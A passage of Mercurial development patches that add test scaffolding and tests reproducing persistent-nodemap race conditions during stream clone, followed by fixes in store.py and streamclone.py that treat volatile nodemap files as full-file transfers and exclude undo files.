--stream -U http://localhost:$HGPORT1 clone; touch "$HG_TEST_STREAM_WALKED_FILE_3") & + $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_1 $ echo >> repo/f1 $ echo >> repo/f2 $ hg -R repo ci -m "1" --config ui.timeout.warn=-1 - $ wait + $ touch $HG_TEST_STREAM_WALKED_FILE_2 + $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_3 $ hg -R clone id 000000000000 + $ cat errors.log $ cd .. Stream repository with bookmarks diff --git a/tests/testlib/ext-stream-clone-steps.py b/tests/testlib/ext-stream-clone-steps.py new file mode 100644 --- /dev/null +++ b/tests/testlib/ext-stream-clone-steps.py @@ -0,0 +1,31 @@ +from __future__ import absolute_import + +from mercurial import ( + encoding, + extensions, + streamclone, + testing, +) + + +WALKED_FILE_1 = encoding.environ[b'HG_TEST_STREAM_WALKED_FILE_1'] +WALKED_FILE_2 = encoding.environ[b'HG_TEST_STREAM_WALKED_FILE_2'] + + +def _test_sync_point_walk_1(orig, repo): + testing.write_file(WALKED_FILE_1) + + +def _test_sync_point_walk_2(orig, repo): + assert repo._currentlock(repo._lockref) is None + testing.wait_file(WALKED_FILE_2) + + +def uisetup(ui): + extensions.wrapfunction( + streamclone, '_test_sync_point_walk_1', _test_sync_point_walk_1 + ) + + extensions.wrapfunction( + streamclone, '_test_sync_point_walk_2', _test_sync_point_walk_2 + ) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618856653 -7200 # Mon Apr 19 20:24:13 2021 +0200 # Node ID d70319c3ca14acfc624fa561f4709cb5ec4396d7 # Parent faa43f09ad980b7ea36c95ea39708fbcf11c692f nodemap: add a test about racy commit during stream clone That test show that the resulting client nodemap is different from the server one. This happens because the server one transferred a corrupted node map. The data file match the pre-commit content while the docket has post commit content. As the result the nodemap was detected invalid and recomputed. When running without the rust implementation, the code is also generating a new datafile unconditionally, This mean the older file is no longer there are transfer time, resulting in a crash. We will fix this issue later, but we start with writing tests highlighting the issue. Differential Revision: https://phab.mercurial-scm.org/D10479 diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -809,10 +809,15 @@ stream clone ------------- +============ The persistent nodemap should exist after a streaming clone +Simple case +----------- + +No race condition + $ hg clone -U --stream --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/test-repo stream-clone --debug | egrep '00(changelog|manifest)' adding [s] 00manifest.n (70 bytes) adding [s] 00manifest.d (452 KB) (no-zstd !) @@ -836,3 +841,128 @@ data-length: 121088 data-unused: 0 data-unused: 0.000% + +new data appened +----------------- + +Other commit happening on the server during the stream clone + +setup the step-by-step stream cloning + + $ HG_TEST_STREAM_WALKED_FILE_1="$TESTTMP/sync_file_walked_1" + $ export HG_TEST_STREAM_WALKED_FILE_1 + $ HG_TEST_STREAM_WALKED_FILE_2="$TESTTMP/sync_file_walked_2" + $ export HG_TEST_STREAM_WALKED_FILE_2 + $ HG_TEST_STREAM_WALKED_FILE_3="$TESTTMP/sync_file_walked_3" + $ export HG_TEST_STREAM_WALKED_FILE_3 + $ cat << EOF >> test-repo/.hg/hgrc + > [extensions] + > steps=$RUNTESTDIR/testlib/ext-stream-clone-steps.py + > EOF + +Check and record file state beforehand + + $ f --size test-repo/.hg/store/00changelog* + test-repo/.hg/store/00changelog-*.nd: size=121088 (glob) + test-repo/.hg/store/00changelog.d: size=376891 (zstd !) + test-repo/.hg/store/00changelog.d: size=368890 (no-zstd !) + test-repo/.hg/store/00changelog.i: size=320384 + test-repo/.hg/store/00changelog.n: size=70 + $ hg -R test-repo debugnodemap --metadata | tee server-metadata.txt + uid: * (glob) + tip-rev: 5005 + tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe + data-length: 121088 + data-unused: 0 + data-unused: 0.000% + +Prepare a commit + + $ echo foo >> test-repo/foo + $ hg -R test-repo/ add test-repo/foo + +Do a mix of clone and commit at the same time so that the file listed on disk differ at actual transfer time. + + $ (hg clone -U --stream --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/test-repo stream-clone-race-1 --debug 2>> clone-output | egrep '00(changelog|manifest)' >> clone-output; touch $HG_TEST_STREAM_WALKED_FILE_3) & + $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_1 + $ hg -R test-repo/ commit -m foo + $ touch $HG_TEST_STREAM_WALKED_FILE_2 + $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_3 + $ cat clone-output + remote: abort: unexpected error: [Errno 2] $ENOENT$: *'$TESTTMP/test-repo/.hg/store/00manifest-*.nd' (glob) (known-bad-output no-rust no-pure !) + abort: pull failed on remote (known-bad-output no-rust no-pure !) + adding [s] 00manifest.n (70 bytes) + adding [s] 00manifest.d (491 KB) (zstd !) + adding [s] 00manifest.d (452 KB) (no-zstd !) + remote: abort: $ENOENT$: '$TESTTMP/test-repo/.hg/store/00manifest-*.nd' (glob) (known-bad-output no-rust no-pure !) + adding [s] 00manifest-*.nd (118 KB) (glob) (rust !) + adding [s] 00changelog.n (70 bytes) (rust !) + adding [s] 00changelog.d (368 KB) (zstd rust !) + adding [s] 00changelog-*.nd (118 KB) (glob) (rust !) + adding [s] 00manifest.i (313 KB) (rust !) + adding [s] 00changelog.i (313 KB) (rust !) + adding [s] 00manifest-*.nd (118 KB) (glob) (pure !) + adding [s] 00changelog.n (70 bytes) (pure !) + adding [s] 00changelog.d (360 KB) (no-zstd !) + adding [s] 00changelog-*.nd (118 KB) (glob) (pure !) + adding [s] 00manifest.i (313 KB) (pure !) + adding [s] 00changelog.i (313 KB) (pure !) + +Check the result state + + $ f --size stream-clone-race-1/.hg/store/00changelog* + stream-clone-race-1/.hg/store/00changelog*: file not found (known-bad-output no-rust no-pure !) + stream-clone-race-1/.hg/store/00changelog-*.nd: size=121088 (glob) (rust !) + stream-clone-race-1/.hg/store/00changelog.d: size=376891 (zstd rust !) + stream-clone-race-1/.hg/store/00changelog.i: size=320384 (rust !) + stream-clone-race-1/.hg/store/00changelog.n: size=70 (rust !) + stream-clone-race-1/.hg/store/00changelog-*.nd: size=121088 (glob) (pure !) + stream-clone-race-1/.hg/store/00changelog.d: size=368890 (no-zstd pure !) + stream-clone-race-1/.hg/store/00changelog.i: size=320384 (pure !) + stream-clone-race-1/.hg/store/00changelog.n: size=70 (pure !) + + $ hg -R stream-clone-race-1 debugnodemap --metadata | tee client-metadata.txt + abort: repository stream-clone-race-1 not found (known-bad-output no-rust no-pure !) + uid: * (glob) (rust !) + tip-rev: 5005 (rust !) + tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe (rust !) + data-length: 121088 (rust !) + data-unused: 0 (rust !) + data-unused: 0.000% (rust !) + uid: * (glob) (pure !) + tip-rev: 5005 (pure !) + tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe (pure !) + data-length: 121088 (pure !) + data-unused: 0 (pure !) + data-unused: 0.000% (pure !) + +We get a usable nodemap, so no rewrite would be needed and the metadata should be identical +(ie: the following diff should be empty) + + $ diff -u server-metadata.txt client-metadata.txt + --- server-metadata.txt * (glob) (known-bad-output !) + +++ client-metadata.txt * (glob) (known-bad-output !) + @@ -1,4 +1,4 @@ (known-bad-output rust !) + @@ -1,4 +1,4 @@ (known-bad-output pure !) + @@ -1,6 +0,0 @@ (known-bad-output no-rust no-pure !) + -uid: * (glob) (known-bad-output !) + +uid: * (glob) (known-bad-output rust !) + tip-rev: 5005 (known-bad-output rust !) + tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe (known-bad-output rust !) + data-length: 121088 (known-bad-output rust !) + +uid: * (glob) (known-bad-output pure !) + tip-rev: 5005 (known-bad-output pure !) + tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe (known-bad-output pure !) + data-length: 121088 (known-bad-output pure !) + -tip-rev: 5005 (known-bad-output no-rust no-pure !) + -tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe (known-bad-output no-rust no-pure !) + -data-length: 121088 (known-bad-output no-rust no-pure !) + -data-unused: 0 (known-bad-output no-rust no-pure !) + -data-unused: 0.000% (known-bad-output no-rust no-pure !) + [1] + +Clean up after the test. + + $ rm -f "$HG_TEST_STREAM_WALKED_FILE_1" + $ rm -f "$HG_TEST_STREAM_WALKED_FILE_2" + $ rm -f "$HG_TEST_STREAM_WALKED_FILE_3" # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618858066 -7200 # Mon Apr 19 20:47:46 2021 +0200 # Node ID dc95c8ca171f9f8f5154156012df9a7cd258cc66 # Parent d70319c3ca14acfc624fa561f4709cb5ec4396d7 nodemap: add a test about nodemap "vacuum" during stream clone When the nodemap "vacuum" it generate a new datafile, with a new unique name and delete the old one. This confuse the stream clone code and create the same kind of crash we were seeing in the previous patch. We build a test case where this happens. The next changeset will contains a fix We can also notice that we are, wrongfully exchanging `undo.*` files that the client will not be able to use. This will be dealt with soon. Differential Revision: https://phab.mercurial-scm.org/D10480 diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -966,3 +966,100 @@ $ rm -f "$HG_TEST_STREAM_WALKED_FILE_1" $ rm -f "$HG_TEST_STREAM_WALKED_FILE_2" $ rm -f "$HG_TEST_STREAM_WALKED_FILE_3" + +full regeneration +----------------- + +A full nodemap is generated + +(ideally this test would append enough data to make sure the nodemap data file +get changed, however to make thing simpler we will force the regeneration for +this test. + +Check the initial state + + $ f --size test-repo/.hg/store/00changelog* + test-repo/.hg/store/00changelog-*.nd: size=121344 (glob) (rust !) + test-repo/.hg/store/00changelog-*.nd: size=121344 (glob) (pure !) + test-repo/.hg/store/00changelog-*.nd: size=121152 (glob) (no-rust no-pure !) + test-repo/.hg/store/00changelog.d: size=376950 (zstd !) + test-repo/.hg/store/00changelog.d: size=368949 (no-zstd !) + test-repo/.hg/store/00changelog.i: size=320448 + test-repo/.hg/store/00changelog.n: size=70 + $ hg -R test-repo debugnodemap --metadata | tee server-metadata-2.txt + uid: * (glob) + tip-rev: 5006 + tip-node: ed2ec1eef9aa2a0ec5057c51483bc148d03e810b + data-length: 121344 (rust !) + data-unused: 192 (rust !) + data-unused: 0.158% (rust !) + data-length: 121152 (no-rust no-pure !) + data-unused: 0 (no-rust no-pure !) + data-unused: 0.000% (no-rust no-pure !) + data-length: 121344 (pure !) + data-unused: 192 (pure !) + data-unused: 0.158% (pure !) + +Performe the mix of clone and full refresh of the nodemap, so that the files +(and filenames) are different between listing time and actual transfer time. + + $ (hg clone -U --stream --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/test-repo stream-clone-race-2 --debug 2>> clone-output-2 | egrep '00(changelog|manifest)' >> clone-output-2; touch $HG_TEST_STREAM_WALKED_FILE_3) & + $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_1 + $ rm test-repo/.hg/store/00changelog.n + $ rm test-repo/.hg/store/00changelog-*.nd + $ hg -R test-repo/ debugupdatecache + $ touch $HG_TEST_STREAM_WALKED_FILE_2 + $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_3 + $ cat clone-output-2 + remote: abort: unexpected error: [Errno 2] $ENOENT$: *'$TESTTMP/test-repo/.hg/store/00changelog-*.nd' (glob) (known-bad-output rust !) + remote: abort: unexpected error: [Errno 2] $ENOENT$: *'$TESTTMP/test-repo/.hg/store/00changelog-*.nd' (glob) (known-bad-output pure !) + remote: abort: unexpected error: [Errno 2] $ENOENT$: *'$TESTTMP/test-repo/.hg/store/00manifest-*.nd' (glob) (known-bad-output no-pure no-rust !) + abort: pull failed on remote (known-bad-output !) + adding [s] undo.backup.00manifest.n (70 bytes) (known-bad-output !) + adding [s] undo.backup.00changelog.n (70 bytes) (known-bad-output !) + adding [s] 00manifest.n (70 bytes) + adding [s] 00manifest.d (492 KB) (zstd !) + adding [s] 00manifest.d (452 KB) (no-zstd !) + adding [s] 00manifest-*.nd (118 KB) (glob) (rust !) + adding [s] 00manifest-*.nd (118 KB) (glob) (pure !) + remote: abort: $ENOENT$: '$TESTTMP/test-repo/.hg/store/00changelog-*.nd' (glob) (known-bad-output rust !) + remote: abort: $ENOENT$: '$TESTTMP/test-repo/.hg/store/00manifest-*.nd' (glob) (known-bad-output no-pure no-rust !) + adding [s] 00changelog.n (70 bytes) (pure !) + adding [s] 00changelog.d (360 KB) (no-zstd !) + remote: abort: $ENOENT$: '$TESTTMP/test-repo/.hg/store/00changelog-*.nd' (glob) (known-bad-output pure !) + +Check the result. + + $ f --size stream-clone-race-2/.hg/store/00changelog* + stream-clone-race-2/.hg/store/00changelog*: file not found (known-bad-output !) + + $ hg -R stream-clone-race-2 debugnodemap --metadata | tee client-metadata-2.txt + abort: repository stream-clone-race-2 not found (known-bad-output !) + +We get a usable nodemap, so no rewrite would be needed and the metadata should be identical +(ie: the following diff should be empty) + + $ diff -u server-metadata-2.txt client-metadata-2.txt + --- server-metadata-2.txt * (glob) (known-bad-output !) + +++ client-metadata-2.txt * (glob) (known-bad-output !) + @@ -1,6 +0,0 @@ (known-bad-output !) + -uid: * (glob) (known-bad-output !) + -tip-rev: 5006 (known-bad-output !) + -tip-node: ed2ec1eef9aa2a0ec5057c51483bc148d03e810b (known-bad-output !) + -data-length: 121344 (known-bad-output rust !) + -data-unused: 192 (known-bad-output rust !) + -data-unused: 0.158% (known-bad-output rust !) + -data-length: 121344 (known-bad-output pure !) + -data-unused: 192 (known-bad-output pure !) + -data-unused: 0.158% (known-bad-output pure !) + -data-length: 121152 (known-bad-output no-rust no-pure !) + -data-unused: 0 (known-bad-output no-rust no-pure !) + -data-unused: 0.000% (known-bad-output no-rust no-pure !) + [1] + +Clean up after the test + + $ rm -f $HG_TEST_STREAM_WALKED_FILE_1 + $ rm -f $HG_TEST_STREAM_WALKED_FILE_2 + $ rm -f $HG_TEST_STREAM_WALKED_FILE_3 + # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618888135 -7200 # Tue Apr 20 05:08:55 2021 +0200 # Node ID aed6ceaad6d7f4de350550c7486758ea1290d09d # Parent dc95c8ca171f9f8f5154156012df9a7cd258cc66 streamclone: treat volatile file as "fullfile" The nodemap related file might change (or get deleted) during the stream clone in a way incompatible with the streaming process. So we introduce a new flag for this type of file and integrate it with the existing `revlog_type` field recently added to `store.walk` returns. We use that new flat to dispatch such file to the existing mechanism for "atomic replacement" file for the nodemap docket and datafile. This fix the bugs we have been adding tests for. Strictly speaking, the nodemap datafile is happened only a could maybe be used in a slightly more efficient way, however this is good enough for now. Differential Revision: https://phab.mercurial-scm.org/D10481 diff --git a/mercurial/store.py b/mercurial/store.py --- a/mercurial/store.py +++ b/mercurial/store.py @@ -389,6 +389,11 @@ REVLOG_FILES_MAIN_EXT = (b'.i', b'i.tmpcensored') REVLOG_FILES_OTHER_EXT = (b'.d', b'.n', b'.nd', b'd.tmpcensored') +# files that are "volatile" and might change between listing and streaming +# +# note: the ".nd" file are nodemap data and won't "change" but they might be +# deleted. +REVLOG_FILES_VOLATILE_EXT = (b'.n', b'.nd') def is_revlog(f, kind, st): @@ -401,7 +406,10 @@ if f.endswith(REVLOG_FILES_MAIN_EXT): return FILEFLAGS_REVLOG_MAIN elif f.endswith(REVLOG_FILES_OTHER_EXT): - return FILETYPE_FILELOG_OTHER + t = FILETYPE_FILELOG_OTHER + if f.endswith(REVLOG_FILES_VOLATILE_EXT): + t |= FILEFLAGS_VOLATILE + return t # the file is part of changelog data @@ -418,6 +426,9 @@ # a secondary file for a revlog FILEFLAGS_REVLOG_OTHER = 1 << 0 +# files that are "volatile" and might change between listing and streaming +FILEFLAGS_VOLATILE = 1 << 20 + FILETYPE_CHANGELOG_MAIN = FILEFLAGS_CHANGELOG | FILEFLAGS_REVLOG_MAIN FILETYPE_CHANGELOG_OTHER = FILEFLAGS_CHANGELOG | FILEFLAGS_REVLOG_OTHER FILETYPE_MANIFESTLOG_MAIN = FILEFLAGS_MANIFESTLOG | FILEFLAGS_REVLOG_MAIN diff --git a/mercurial/streamclone.py b/mercurial/streamclone.py --- a/mercurial/streamclone.py +++ b/mercurial/streamclone.py @@ -628,7 +628,10 @@ repo.ui.debug(b'scanning\n') for rl_type, name, ename, size in _walkstreamfiles(repo, matcher): if size: - entries.append((_srcstore, name, _fileappend, size)) + ft = _fileappend + if rl_type & store.FILEFLAGS_VOLATILE: + ft = _filefull + entries.append((_srcstore, name, ft, size)) totalfilesize += size for name in _walkstreamfullstorefiles(repo): if repo.svfs.exists(name): diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -820,13 +820,13 @@ $ hg clone -U --stream --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/test-repo stream-clone --debug | egrep '00(changelog|manifest)' adding [s] 00manifest.n (70 bytes) - adding [s] 00manifest.d (452 KB) (no-zstd !) - adding [s] 00manifest.d (491 KB) (zstd !) adding [s] 00manifest-*.nd (118 KB) (glob) adding [s] 00changelog.n (70 bytes) + adding [s] 00changelog-*.nd (118 KB) (glob) + adding [s] 00manifest.d (452 KB) (no-zstd !) + adding [s] 00manifest.d (491 KB) (zstd !) adding [s] 00changelog.d (360 KB) (no-zstd !) adding [s] 00changelog.d (368 KB) (zstd !) - adding [s] 00changelog-*.nd (118 KB) (glob) adding [s] 00manifest.i (313 KB) adding [s] 00changelog.i (313 KB) $ ls -1 stream-clone/.hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)' @@ -889,77 +889,54 @@ $ touch $HG_TEST_STREAM_WALKED_FILE_2 $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_3 $ cat clone-output - remote: abort: unexpected error: [Errno 2] $ENOENT$: *'$TESTTMP/test-repo/.hg/store/00manifest-*.nd' (glob) (known-bad-output no-rust no-pure !) - abort: pull failed on remote (known-bad-output no-rust no-pure !) adding [s] 00manifest.n (70 bytes) - adding [s] 00manifest.d (491 KB) (zstd !) + adding [s] 00manifest-*.nd (118 KB) (glob) + adding [s] 00changelog.n (70 bytes) + adding [s] 00changelog-*.nd (118 KB) (glob) adding [s] 00manifest.d (452 KB) (no-zstd !) - remote: abort: $ENOENT$: '$TESTTMP/test-repo/.hg/store/00manifest-*.nd' (glob) (known-bad-output no-rust no-pure !) - adding [s] 00manifest-*.nd (118 KB) (glob) (rust !) - adding [s] 00changelog.n (70 bytes) (rust !) - adding [s] 00changelog.d (368 KB) (zstd rust !) - adding [s] 00changelog-*.nd (118 KB) (glob) (rust !) - adding [s] 00manifest.i (313 KB) (rust !) - adding [s] 00changelog.i (313 KB) (rust !) - adding [s] 00manifest-*.nd (118 KB) (glob) (pure !) - adding [s] 00changelog.n (70 bytes) (pure !) + adding [s] 00manifest.d (491 KB) (zstd !) adding [s] 00changelog.d (360 KB) (no-zstd !) - adding [s] 00changelog-*.nd (118 KB) (glob) (pure !) - adding [s] 00manifest.i (313 KB) (pure !) - adding [s] 00changelog.i (313 KB) (pure !) + adding [s] 00changelog.d (368 KB) (zstd !) + adding [s] 00manifest.i (313 KB) + adding [s] 00changelog.i (313 KB) Check the result state $ f --size stream-clone-race-1/.hg/store/00changelog* - stream-clone-race-1/.hg/store/00changelog*: file not found (known-bad-output no-rust no-pure !) - stream-clone-race-1/.hg/store/00changelog-*.nd: size=121088 (glob) (rust !) - stream-clone-race-1/.hg/store/00changelog.d: size=376891 (zstd rust !) - stream-clone-race-1/.hg/store/00changelog.i: size=320384 (rust !) - stream-clone-race-1/.hg/store/00changelog.n: size=70 (rust !) - stream-clone-race-1/.hg/store/00changelog-*.nd: size=121088 (glob) (pure !) - stream-clone-race-1/.hg/store/00changelog.d: size=368890 (no-zstd pure !) - stream-clone-race-1/.hg/store/00changelog.i: size=320384 (pure !) - stream-clone-race-1/.hg/store/00changelog.n: size=70 (pure !) + stream-clone-race-1/.hg/store/00changelog-*.nd: size=121088 (glob) + stream-clone-race-1/.hg/store/00changelog.d: size=368890 (no-zstd !) + stream-clone-race-1/.hg/store/00changelog.d: size=376891 (zstd !) + stream-clone-race-1/.hg/store/00changelog.i: size=320384 + stream-clone-race-1/.hg/store/00changelog.n: size=70 $ hg -R stream-clone-race-1 debugnodemap --metadata | tee client-metadata.txt - abort: repository stream-clone-race-1 not found (known-bad-output no-rust no-pure !) - uid: * (glob) (rust !) - tip-rev: 5005 (rust !) - tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe (rust !) - data-length: 121088 (rust !) - data-unused: 0 (rust !) - data-unused: 0.000% (rust !) - uid: * (glob) (pure !) - tip-rev: 5005 (pure !) - tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe (pure !) - data-length: 121088 (pure !) - data-unused: 0 (pure !) - data-unused: 0.000% (pure !) + uid: * (glob) + tip-rev: 5005 + tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe + data-length: 121088 + data-unused: 0 + data-unused: 0.000% We get a usable nodemap, so no rewrite would be needed and the metadata should be identical (ie: the following diff should be empty) +This isn't the case for the `no-rust` `no-pure` implementation as it use a very minimal nodemap implementation that unconditionnaly rewrite the nodemap "all the time". + +#if no-rust no-pure $ diff -u server-metadata.txt client-metadata.txt - --- server-metadata.txt * (glob) (known-bad-output !) - +++ client-metadata.txt * (glob) (known-bad-output !) - @@ -1,4 +1,4 @@ (known-bad-output rust !) - @@ -1,4 +1,4 @@ (known-bad-output pure !) - @@ -1,6 +0,0 @@ (known-bad-output no-rust no-pure !) - -uid: * (glob) (known-bad-output !) - +uid: * (glob) (known-bad-output rust !) - tip-rev: 5005 (known-bad-output rust !) - tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe (known-bad-output rust !) - data-length: 121088 (known-bad-output rust !) - +uid: * (glob) (known-bad-output pure !) - tip-rev: 5005 (known-bad-output pure !) - tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe (known-bad-output pure !) - data-length: 121088 (known-bad-output pure !) - -tip-rev: 5005 (known-bad-output no-rust no-pure !) - -tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe (known-bad-output no-rust no-pure !) - -data-length: 121088 (known-bad-output no-rust no-pure !) - -data-unused: 0 (known-bad-output no-rust no-pure !) - -data-unused: 0.000% (known-bad-output no-rust no-pure !) + --- server-metadata.txt * (glob) + +++ client-metadata.txt * (glob) + @@ -1,4 +1,4 @@ + -uid: * (glob) + +uid: * (glob) + tip-rev: 5005 + tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe + data-length: 121088 [1] +#else + $ diff -u server-metadata.txt client-metadata.txt +#endif + Clean up after the test. @@ -991,14 +968,14 @@ tip-rev: 5006 tip-node: ed2ec1eef9aa2a0ec5057c51483bc148d03e810b data-length: 121344 (rust !) + data-length: 121344 (pure !) + data-length: 121152 (no-rust no-pure !) data-unused: 192 (rust !) - data-unused: 0.158% (rust !) - data-length: 121152 (no-rust no-pure !) + data-unused: 192 (pure !) data-unused: 0 (no-rust no-pure !) + data-unused: 0.158% (rust !) + data-unused: 0.158% (pure !) data-unused: 0.000% (no-rust no-pure !) - data-length: 121344 (pure !) - data-unused: 192 (pure !) - data-unused: 0.158% (pure !) Performe the mix of clone and full refresh of the nodemap, so that the files (and filenames) are different between listing time and actual transfer time. @@ -1011,51 +988,63 @@ $ touch $HG_TEST_STREAM_WALKED_FILE_2 $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_3 $ cat clone-output-2 - remote: abort: unexpected error: [Errno 2] $ENOENT$: *'$TESTTMP/test-repo/.hg/store/00changelog-*.nd' (glob) (known-bad-output rust !) - remote: abort: unexpected error: [Errno 2] $ENOENT$: *'$TESTTMP/test-repo/.hg/store/00changelog-*.nd' (glob) (known-bad-output pure !) - remote: abort: unexpected error: [Errno 2] $ENOENT$: *'$TESTTMP/test-repo/.hg/store/00manifest-*.nd' (glob) (known-bad-output no-pure no-rust !) - abort: pull failed on remote (known-bad-output !) adding [s] undo.backup.00manifest.n (70 bytes) (known-bad-output !) adding [s] undo.backup.00changelog.n (70 bytes) (known-bad-output !) adding [s] 00manifest.n (70 bytes) + adding [s] 00manifest-*.nd (118 KB) (glob) + adding [s] 00changelog.n (70 bytes) + adding [s] 00changelog-*.nd (118 KB) (glob) adding [s] 00manifest.d (492 KB) (zstd !) adding [s] 00manifest.d (452 KB) (no-zstd !) - adding [s] 00manifest-*.nd (118 KB) (glob) (rust !) - adding [s] 00manifest-*.nd (118 KB) (glob) (pure !) - remote: abort: $ENOENT$: '$TESTTMP/test-repo/.hg/store/00changelog-*.nd' (glob) (known-bad-output rust !) - remote: abort: $ENOENT$: '$TESTTMP/test-repo/.hg/store/00manifest-*.nd' (glob) (known-bad-output no-pure no-rust !) - adding [s] 00changelog.n (70 bytes) (pure !) adding [s] 00changelog.d (360 KB) (no-zstd !) - remote: abort: $ENOENT$: '$TESTTMP/test-repo/.hg/store/00changelog-*.nd' (glob) (known-bad-output pure !) + adding [s] 00changelog.d (368 KB) (zstd !) + adding [s] 00manifest.i (313 KB) + adding [s] 00changelog.i (313 KB) Check the result. $ f --size stream-clone-race-2/.hg/store/00changelog* - stream-clone-race-2/.hg/store/00changelog*: file not found (known-bad-output !) + stream-clone-race-2/.hg/store/00changelog-*.nd: size=121344 (glob) (rust !) + stream-clone-race-2/.hg/store/00changelog-*.nd: size=121344 (glob) (pure !) + stream-clone-race-2/.hg/store/00changelog-*.nd: size=121152 (glob) (no-rust no-pure !) + stream-clone-race-2/.hg/store/00changelog.d: size=376950 (zstd !) + stream-clone-race-2/.hg/store/00changelog.d: size=368949 (no-zstd !) + stream-clone-race-2/.hg/store/00changelog.i: size=320448 + stream-clone-race-2/.hg/store/00changelog.n: size=70 $ hg -R stream-clone-race-2 debugnodemap --metadata | tee client-metadata-2.txt - abort: repository stream-clone-race-2 not found (known-bad-output !) + uid: * (glob) + tip-rev: 5006 + tip-node: ed2ec1eef9aa2a0ec5057c51483bc148d03e810b + data-length: 121344 (rust !) + data-unused: 192 (rust !) + data-unused: 0.158% (rust !) + data-length: 121152 (no-rust no-pure !) + data-unused: 0 (no-rust no-pure !) + data-unused: 0.000% (no-rust no-pure !) + data-length: 121344 (pure !) + data-unused: 192 (pure !) + data-unused: 0.158% (pure !) We get a usable nodemap, so no rewrite would be needed and the metadata should be identical (ie: the following diff should be empty) +This isn't the case for the `no-rust` `no-pure` implementation as it use a very minimal nodemap implementation that unconditionnaly rewrite the nodemap "all the time". + +#if no-rust no-pure $ diff -u server-metadata-2.txt client-metadata-2.txt - --- server-metadata-2.txt * (glob) (known-bad-output !) - +++ client-metadata-2.txt * (glob) (known-bad-output !) - @@ -1,6 +0,0 @@ (known-bad-output !) - -uid: * (glob) (known-bad-output !) - -tip-rev: 5006 (known-bad-output !) - -tip-node: ed2ec1eef9aa2a0ec5057c51483bc148d03e810b (known-bad-output !) - -data-length: 121344 (known-bad-output rust !) - -data-unused: 192 (known-bad-output rust !) - -data-unused: 0.158% (known-bad-output rust !) - -data-length: 121344 (known-bad-output pure !) - -data-unused: 192 (known-bad-output pure !) - -data-unused: 0.158% (known-bad-output pure !) - -data-length: 121152 (known-bad-output no-rust no-pure !) - -data-unused: 0 (known-bad-output no-rust no-pure !) - -data-unused: 0.000% (known-bad-output no-rust no-pure !) + --- server-metadata-2.txt * (glob) + +++ client-metadata-2.txt * (glob) + @@ -1,4 +1,4 @@ + -uid: * (glob) + +uid: * (glob) + tip-rev: 5006 + tip-node: ed2ec1eef9aa2a0ec5057c51483bc148d03e810b + data-length: 121152 [1] +#else + $ diff -u server-metadata-2.txt client-metadata-2.txt +#endif Clean up after the test # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618885623 -7200 # Tue Apr 20 04:27:03 2021 +0200 # Node ID 0b569c75d1808f05056e3e779993186ceded830f # Parent aed6ceaad6d7f4de350550c7486758ea1290d09d store: exclude `undo.` nodemap's file from `walk` There are "temporary" local file that we should not be transfered by `walk` user like local clone and stream clone. This fix the small issue that the new tests highlighted. Differential Revision: https://phab.mercurial-scm.org/D10482 diff --git a/mercurial/store.py b/mercurial/store.py --- a/mercurial/store.py +++ b/mercurial/store.py @@ -10,6 +10,7 @@ import errno import functools import os +import re import stat from .i18n import _ @@ -395,6 +396,9 @@ # deleted. REVLOG_FILES_VOLATILE_EXT = (b'.n', b'.nd') +# some exception to the above matching +EXCLUDED = re.compile(b'.*undo\.[^/]+\.nd?$') + def is_revlog(f, kind, st): if kind != stat.S_IFREG: @@ -405,7 +409,7 @@ def revlog_type(f): if f.endswith(REVLOG_FILES_MAIN_EXT): return FILEFLAGS_REVLOG_MAIN - elif f.endswith(REVLOG_FILES_OTHER_EXT): + elif f.endswith(REVLOG_FILES_OTHER_EXT) and EXCLUDED.match(f) is None: t = FILETYPE_FILELOG_OTHER if f.endswith(REVLOG_FILES_VOLATILE_EXT): t |= FILEFLAGS_VOLATILE diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -988,8 +988,6 @@ $ touch $HG_TEST_STREAM_WALKED_FILE_2 $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_3 